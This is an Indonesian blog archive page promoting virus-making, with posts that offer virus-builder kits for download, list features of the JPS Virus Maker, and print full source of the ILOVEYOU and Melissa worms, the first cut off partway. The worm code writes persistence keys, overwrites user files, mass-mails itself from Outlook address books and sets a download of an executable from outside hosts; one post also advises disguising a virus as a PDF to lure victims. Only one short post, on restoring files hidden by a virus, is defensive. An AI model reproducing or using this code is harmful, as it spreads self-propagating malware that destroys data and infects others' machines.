Showing posts with label Virus Maker and Source. Show all posts
Showing posts with label Virus Maker and Source. Show all posts

Friday, April 24, 2009

Dr. VBS VIrus Maker

Penulis hadirkan kembali program untuk membuat virus dengan cara yang sangat mudah dan cepat. Program ini direkomendasikan bagi anda yang tertarik dengan masalah virulogi, tapi tidak memiliki cukup waktu atau belum mengerti tentang bahasa pemrograman.

Now, Everyone can be a Virus Maker.

Cara menggunakan program ini sangat mudah. Pertama, anda buka file Dr. VBS Virus MAker.exe. Kemudian copy pastekan source virus yang telah di attached dalam folder source ke dalam program tersebut. Beberapa source code yang diberikan adalah Antideletion yaitu untuk membuat kembali virus yang didelete, Start UP adalah untuk membuat virus buatan anda dapat berjalan pada saat awal komputer di hidupkan, dll.
Selain itu, anda juga dapat menggunakan source code virus lain yang telah penulis berikan pada postingan - postingan sebelumnya agar virus buatan anda lebih Powerfull.

Be a Wise Hacker! Don't use hacking for cracking, use it for education.

Tuesday, April 07, 2009

BB's Virus Suit

BB's Virus Suite Content:

1. BB's Media Player
2. Extras:
- Matrix Batch
- ieexpress
- windows genie
- cmd account
3. Sample Virus Code
4. Pop-up Maker Classic
5. Windows Attacker Classic
6. Jakash3 Remote
7. Popmaker
8. String Editor
9. Many more...


File type: Rar
Size: 4.62 Mb
Download...

Thursday, May 08, 2008

Virus Paling Danger bisa bikin harddisk gak bisa kepake lagi


Percaya atau tidak.. virus ini sangat berbahaya karena bisa bikin harddisk gk bekerja lagi. Menggunakan bash language, bentuk file .bat tetapi sudah Saya compile ke exe. Bagi yang ingin tau source codenya, silahkan download disini, atau file exe nya download disini

Tuesday, May 06, 2008

JPS Virus Maker V.3

Download JPS Virus Maker V.3


Satu lagi, program pembuat virus dengan mudah, JPS Virus Maker V.3 yang dibuat menggunakan Delphi. Kita dapat mengganti nama dengan yang lebih menarik, pada gambar dibawah ini, saya membuat 2contoh hasil dari jps virus maker ini, yang satu menggunakan icon setup dengan nama sender sedangkan yg satu menggunakan icon pdf dengan nama Majalah Playboy edisi may 2008. Mana yang lebih membuat orang penasar untuk membuka? inti dari sebuah virus adalah gimana penyebaran tersebut dapat cepat dilakukan. Dan lebih baik lagi jika file virus tersebut di binding menggunakan Demon Binding, sehingga sulit terdeteksi sebagai virus. Sayang saya lupa naro Softwarenya :( tp laen kali pasti saya postingin deh ;)

Features:

Disable Registry Editor
Disable Ms Config
Disable Task Manager
Disable Yahoo! Messenger
Disable Media Player
Disable Internet Explorer
Disable Time
Disable Group Policy
Disable Windows Explorer
Disable Norton Antivirus
Disable McAfee Antivirus
Disable Note Pad
Disable Word Pad
Disable Winows
Disable DHCP Client Service
Disable Taskbar
Disable Start Button
Disable MSN Messenger
Disable Command Prompt
Disable Security Center
Disable MSN Messenger
Disable System Restore
Disable Control Panel
Disable Desktop Icons
Disable Screen Saver
Hide Service Manager
Hide Outlook Express
Hide Windows Clock
Hide Desktop Icons
Hide All Process in Task Manager
Hide All Tasks in Task Manager
Hide Run in Start Menu
Change Explorer Caption
Clear Windows XP Password
Swap Mouse Buttons
Remove Folder Options
Lock Mouse & Keyboards
Mute Sound
Crazy Mouse
Allways CD-ROM Open
Turn Off Monitor (30 sec's)
Destroy Taskbar
Destroy Offlines (Y!Messenger)
Destroy Protected Strorage
Destroy Audio Service
Destroy Clipboard
Terminate Windows
Hide Cursor
Auto Startup
Restart-Logoff-Turnoff-Hibrinate Automatic After 30 minutes
Change Server Name After Install in Process
Change Server Name
-------------------------------------
New Fetures in Version 3.0:

Change XP Password
Change Computer Name
Change IE Home Page
Close Custom Windows
Disable Custom Service
Disable Process
Open Custom Website
Run Custom Command
Enable Convert To Worm - Auto Copy Server To Active Path With Custom Name & Time
Change Custom Icon For Server (15 Icons)

Wednesday, April 23, 2008

Source Virus I Love U

rem barok -loveletter(vbe)
rem by: spyder / ispyder@mail.com / @GRAMMERSoft Group /
Manila,Philippines
On Error Resume Next
dim fso,dirsystem,dirwin,dirtemp,eq,ctr,file,vbscopy,dow
eq=""
ctr=0
Set fso = CreateObject("Scripting.FileSystemObject")
set file = fso.OpenTextFile(WScript.ScriptFullname,1)
vbscopy=file.ReadAll
main()
sub main()
On Error Resume Next
dim wscr,rr
set wscr=CreateObject("WScript.Shell")
rr=wscr.RegRead("HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting
Host\Settings\Timeout")
if (rr>=1) then
wscr.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting
Host\Settings\Timeout",0,"REG_DWORD"
end if
Set dirwin = fso.GetSpecialFolder(0)
Set dirsystem = fso.GetSpecialFolder(1)
Set dirtemp = fso.GetSpecialFolder(2)
Set c = fso.GetFile(WScript.ScriptFullName)
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
regruns()
html()
spreadtoemail()
listadriv()
end sub
sub regruns()
On Error Resume Next
Dim num,downread
regcreate
"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MSKernel32
",dirsystem&"\MSKernel32.vbs"
regcreate
"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices\Wi
n32DLL",dirwin&"\Win32DLL.vbs"
downread=""
downread=regget("HKEY_CURRENT_USER\Software\Microsoft\Internet
Explorer\Download Directory")
if (downread="") then
downread="c:\"
end if
if (fileexist(dirsystem&"\WinFAT32.exe")=1) then
Randomize
num = Int((4 * Rnd) + 1)
if num = 1 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start
Page","http://www.skyinet.net/~young1s/HJKhjnwerhjkxcvytwertnMTFwetrdsfmhPnj
w6587345gvsdf7679njbvYT/WIN-BUGSFIX.exe"
elseif num = 2 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start
Page","http://www.skyinet.net/~angelcat/skladjflfdjghKJnwetryDGFikjUIyqwerWe
546786324hjk4jnHHGbvbmKLJKjhkqj4w/WIN-BUGSFIX.exe"
elseif num = 3 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start
Page","http://www.skyinet.net/~koichi/jf6TRjkcbGRpGqaq198vbFV5hfFEkbopBdQZnm
POhfgER67b3Vbvg/WIN-BUGSFIX.exe"
elseif num = 4 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start
Page","http://www.skyinet.net/~chu/sdgfhjksdfjklNBmnfgkKLHjkqwtuHJBhAFSDGjkh
YUgqwerasdjhPhjasfdglkNBhbqwebmznxcbvnmadshfgqw237461234iuy7thjg/WIN-BUGSFIX
.exe"
end if
end if
if (fileexist(downread&"\WIN-BUGSFIX.exe")=0) then
regcreate
"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\WIN-BUGSFI
X",downread&"\WIN-BUGSFIX.exe"
regcreate "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start
Page","about:blank"
end if
end sub
sub listadriv
On Error Resume Next
Dim d,dc,s
Set dc = fso.Drives
For Each d in dc
If d.DriveType = 2 or d.DriveType=3 Then
folderlist(d.path&"\")
end if
Next
listadriv = s
end sub
sub infectfiles(folderspec)
On Error Resume Next
dim f,f1,fc,ext,ap,mircfname,s,bname,mp3
set f = fso.GetFolder(folderspec)
set fc = f.Files
for each f1 in fc
ext=fso.GetExtensionName(f1.path)
ext=lcase(ext)
s=lcase(f1.name)
if (ext="vbs") or (ext="vbe") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
elseif(ext="js") or (ext="jse") or (ext="css") or (ext="wsh") or (ext="sct")
or (ext="hta") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
bname=fso.GetBaseName(f1.path)
set cop=fso.GetFile(f1.path)
cop.copy(folderspec&"\"&bname&".vbs")
fso.DeleteFile(f1.path)
elseif(ext="jpg") or (ext="jpeg") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
set cop=fso.GetFile(f1.path)
cop.copy(f1.path&".vbs")
fso.DeleteFile(f1.path)
elseif(ext="mp3") or (ext="mp2") then
set mp3=fso.CreateTextFile(f1.path&".vbs")
mp3.write vbscopy
mp3.close
set att=fso.GetFile(f1.path)
att.attributes=att.attributes+2
end if
if (eq<>folderspec) then
if (s="mirc32.exe") or (s="mlink32.exe") or (s="mirc.ini") or
(s="script.ini") or (s="mirc.hlp") then
set scriptini=fso.CreateTextFile(folderspec&"\script.ini")
scriptini.WriteLine "[script]"
scriptini.WriteLine ";mIRC Script"
scriptini.WriteLine "; Please dont edit this script... mIRC will corrupt,
if mIRC will"
scriptini.WriteLine " corrupt... WINDOWS will affect and will not run
correctly. thanks"
scriptini.WriteLine ";"
scriptini.WriteLine ";Khaled Mardam-Bey"
scriptini.WriteLine ";http://www.mirc.com"
scriptini.WriteLine ";"
scriptini.WriteLine "n0=on 1:JOIN:#:{"
scriptini.WriteLine "n1= /if ( $nick == $me ) { halt }"
scriptini.WriteLine "n2= /.dcc send $nick
"&dirsystem&"\LOVE-LETTER-FOR-YOU.HTM"
scriptini.WriteLine "n3=}"
scriptini.close
eq=folderspec
end if
end if
next
end sub
sub folderlist(folderspec)
On Error Resume Next
dim f,f1,sf
set f = fso.GetFolder(folderspec)
set sf = f.SubFolders
for each f1 in sf
infectfiles(f1.path)
folderlist(f1.path)
next
end sub
sub regcreate(regkey,regvalue)
Set regedit = CreateObject("WScript.Shell")
regedit.RegWrite regkey,regvalue
end sub
function regget(value)
Set regedit = CreateObject("WScript.Shell")
regget=regedit.RegRead(value)
end function
function fileexist(filespec)
On Error Resume Next
dim msg
if (fso.FileExists(filespec)) Then
msg = 0
else
msg = 1
end if
fileexist = msg
end function
function folderexist(folderspec)
On Error Resume Next
dim msg
if (fso.GetFolderExists(folderspec)) then
msg = 0
else
msg = 1
end if
fileexist = msg
end function
sub spreadtoemail()
On Error Resume Next
dim x,a,ctrlists,ctrentries,malead,b,regedit,regv,regad
set regedit=CreateObject("WScript.Shell")
set out=WScript.CreateObject("Outlook.Application")
set mapi=out.GetNameSpace("MAPI")
for ctrlists=1 to mapi.AddressLists.Count
set a=mapi.AddressLists(ctrlists)
x=1
regv=regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a)
if (regv="") then
regv=1
end if
if (int(a.AddressEntries.Count)>int(regv)) then
for ctrentries=1 to a.AddressEntries.Count
malead=a.AddressEntries(x)
regad=""
regad=regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\"&malead)
if (regad="") then
set male=out.CreateItem(0)
male.Recipients.Add(malead)
male.Subject = "ILOVEYOU"
male.Body = vbcrlf&"kindly check the attached LOVELETTER coming from me."
male.Attachments.Add(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
male.Send
regedit.RegWrite
"HKEY_CURRENT_USER\Software\Microsoft\WAB\"&malead,1,"REG_DWORD"
end if
x=x+1
next
regedit.RegWrite
"HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.AddressEntries.Count
else
regedit.RegWrite
"HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.AddressEntries.Count
end if
next
Set out=Nothing
Set mapi=Nothing
end sub
sub html
On Error Resume Next
dim lines,n,dta1,dta2,dt1,dt2,dt3,dt4,l1,dt5,dt6
LOVELETTER - HTMLdta1=""&vbcrlf& _
""&vbcrlf& _
""&vbcrlf& _
""&vbcrlf& _
"

Monday, April 21, 2008

Source Code VIrus Mellisa

Setelah sebelumnya saya memberikan software Visual Basic Portable dan VB Decompiler Pro, kali ini saya ingin memberikan source code virus mellisa yg terkenal itu dan bagi anda yg sudah mengerti tentang VB, silahkan anda coba oprek sendiri virus mellisa ini, dan bagi yg belum bisa, ditunggu aja tutornya yah

Virus Mellisa Source Code:

Private Sub AutoOpen()
On Error Resume Next
p$ = "clone"
If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") <> "" Then
CommandBars("Macro").Controls("Security...").Enabled = False
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
Else
p$ = "clone"
CommandBars("Tools").Controls("Macro").Enabled = False
Options.ConfirmConversions = (1 - 1): Options.VirusProtection = (1 - 1): Options.SaveNormalPrompt = (1 - 1)
End If
Dim UngaDasOutlook, DasMapiName, BreakUmOffASlice
Set UngaDasOutlook = CreateObject("Outlook.Application")
Set DasMapiName = UngaDasOutlook.GetNameSpace("MAPI")
If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\", "Melissa?") <> "... by Kwyjibo" Then
If UngaDasOutlook = "Outlook" Then
DasMapiName.Logon "profile", "password"
For y = 1 To DasMapiName.AddressLists.Count
Set AddyBook = DasMapiName.AddressLists(y)
x = 1
Set BreakUmOffASlice = UngaDasOutlook.CreateItem(0)
For oo = 1 To AddyBook.AddressEntries.Count
Peep = AddyBook.AddressEntries(x)
BreakUmOffASlice.Recipients.Add Peep
x = x + 1
If x > 50 Then oo = AddyBook.AddressEntries.Count
Next oo
BreakUmOffASlice.Subject = "Important Message From " & Application.UserName
BreakUmOffASlice.Body = "Here is that document you asked for ... don't show anyone else ;-)"
BreakUmOffASlice.Attachments.Add ActiveDocument.FullName
BreakUmOffASlice.Send
Peep = ""
Next y
DasMapiName.Logoff
End If
p$ = "clone"
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\", "Melissa?") = "... by Kwyjibo"
End If
Set ADI1 = ActiveDocument.VBProject.VBComponents.Item(1)
Set NTI1 = NormalTemplate.VBProject.VBComponents.Item(1)
NTCL = NTI1.CodeModule.CountOfLines
ADCL = ADI1.CodeModule.CountOfLines
BGN = 2
If ADI1.Name <> "Melissa" Then
If ADCL > 0 Then _
ADI1.CodeModule.DeleteLines 1, ADCL
Set ToInfect = ADI1
ADI1.Name = "Melissa"
DoAD = True
End If
If NTI1.Name <> "Melissa" Then
If NTCL > 0 Then _
NTI1.CodeModule.DeleteLines 1, NTCL
Set ToInfect = NTI1
NTI1.Name = "Melissa"
DoNT = True
End If
If DoNT <> True And DoAD <> True Then GoTo CYA
If DoNT = True Then
Do While ADI1.CodeModule.Lines(1, 1) = ""
ADI1.CodeModule.DeleteLines 1
Loop
ToInfect.CodeModule.AddFromString ("Private Sub Document_Close()")
Do While ADI1.CodeModule.Lines(BGN, 1) <> ""
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
BGN = BGN + 1
Loop
End If
p$ = "clone"
If DoAD = True Then
Do While NTI1.CodeModule.Lines(1, 1) = ""
NTI1.CodeModule.DeleteLines 1
Loop
ToInfect.CodeModule.AddFromString ("Private Sub Document_Open()")
Do While NTI1.CodeModule.Lines(BGN, 1) <> ""
ToInfect.CodeModule.InsertLines BGN, NTI1.CodeModule.Lines(BGN, 1)
BGN = BGN + 1
Loop
End If
CYA:
If NTCL <> 0 And ADCL = 0 And (InStr(1, ActiveDocument.Name, "Document") = False) Then
ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
ElseIf (InStr(1, ActiveDocument.Name, "Document") <> False) Then
ActiveDocument.Saved = True: End If
'WORD/Melissa written by Kwyjibo
'Clone written by Duke/SMF
'Works in both Word 2000 and Word 97
'Worm? Macro Virus? Word 97 Virus? Word 2000 Virus? You Decide!
'Word -> Email | Word 97 <--> Word 2000 ... it's a new age!
If Day(Now) = Minute(Now) Then Selection.TypeText "Twenty-two points, plus triple-word-score, plus fifty points for using all my letters. Game's over. I'm outta here."
End Sub

Friday, April 18, 2008

Mengembalikan file yang disembunyikan virus


Mungkin anda pernah mengalami kejadian, tiba2 isi dalam flash disk anda kosong atau hanya satu atau dua file saja, padahal kita gk mrsa menghapusnya. Dan setelah cek propertis kita semakin kaget, loh ko filenya cuman dua tp size nya udah penuh... Mungkin gambarannya seperti itu yah bingungnya . Halah bodo amat dah.. intinya saya mau mencoba sharing gimana cara mengembalikan data yang telah di sembunyikan virus tanpa menggunakan anti virus.

Jika anda merasa sengaja menghidenkan atau menyembunyikan seluruh isi dalam flash disk, maka coba anda pastikan bahwa file benar - benar di hidden oleh virus, dengan melihat pada folder option, pilih show hidden files and folders. Kemudian kembali lagi ke flash disk, jika tetap tidak ada perubahan, berarti positif tuh kerjaan virus . And the battle begin

Sebelumnya, anda pelajari terlebih dahulu command - comand yg akan kita gunakan sebagai berikut:

+ Mengaktifkan atribut.
- Menonaktifkan atribut.
R Atribut Read-only .
A Atribut Archive .
S Atribut System.
H Atribut Hidden.

[drive:] adalah harddrive.
[path] adalah directory atau folder.
[filename] adalah nama file.

Untuk melanjutkan proses, kita harus memasukan nama file dan atributnya dengan spesifik.

/S Adalah perintah untuk memproses semua file dan folder beserta subfolder-nya.
/D Adalah perintah untuk memproses atribut folder.

Perang lawan virus kita mulai
dan sekarang anda klik START, kemudian pilih RUN dan ketikan CMD untuk mengecek atribut file.

Ketikan perintah ini = F:\>attrib /S *.*
Comand tersebut artinya, pada drive F (jika flash disk berada pada drive F) munculkan semua folder beserta subfolder dan file-file nya yang memiliki atribut hidden atau tersembunyi.

Dan akan muncul root seperti contoh di bawah ini:

H S F:\just\renungan.doc
H S F:\just\chat kiler v.30.exe
H S F:\just\logo web.jpg

Pada contoh diatas, dapat kita deskripsikan bahwa semua file atributnya di hidden dan ditambahkan atribut system sehingga tidak bisa dilihat oleh windows explorer.
untuk mengembalikan file tersebut agar dapat terlihat, isi perintah dibawah ini, masih di cmd atau command prompt:
F:\>attrib -s -h /S *.*

Penjelasan dari command tersebut adalah, -h dan -s berati menonaktifkan atribut hidden dan system, /s memproses folder secara keseluruhan pada drive f (flash disk) dan *.* merupakan perintah yang berarti merubah attribut pada seluruh file dalam drive tersebut dalam hal ini berarti flash disk.

Sekarang coba lihat pada flash disk, apakah sudah ada perubahan? silahkan mencoba.

Friday, April 11, 2008

Tutorial Membuat VIrus - Seri 1


Ingin jadi Virus Maker dengan cara yang simple? pengen bisa bikin virus tanpa perlu belajar bahasa pemrograman? kali ini saya ingin membagi pengetahuan mengenai cara menjadi ViMi tanpa perlu dasar pemrograman yang kuat, karena hanya dengan beberapa klik, anda sudah dapat membuat virus yang tak kalah hebatnya dengan virus Brontok maupun Anna Kournikova.

Sebenernya banyak tool atau program instant untuk membuat virus yang hebat dan berbahaya, salah satunya dengan Terabit Virus Maker ini, Dan ingat Sebaiknya komputer anda dalam keadaan aman, terinstall deepfreeze dan aktif sehingga komputer lebih aman.


SEGALA RESIKO YANG DITIMBULKAN AKIBAT PROGRAM INI 100% ADALAH TANGGUNG JAWAB ANDA SENDIRI. JADI JIKA RAGU, LEBIH BAIK TIDAK USAH DICOBA. DAN PASTIKAN DEEPFREEZE PADA KOMPUTER ANDA TELAH AKTIF.

Download Terabit Virus Maker